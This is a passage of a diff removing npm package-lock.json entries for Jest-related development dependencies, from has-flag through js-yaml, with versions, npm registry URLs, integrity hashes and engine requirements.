"^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": 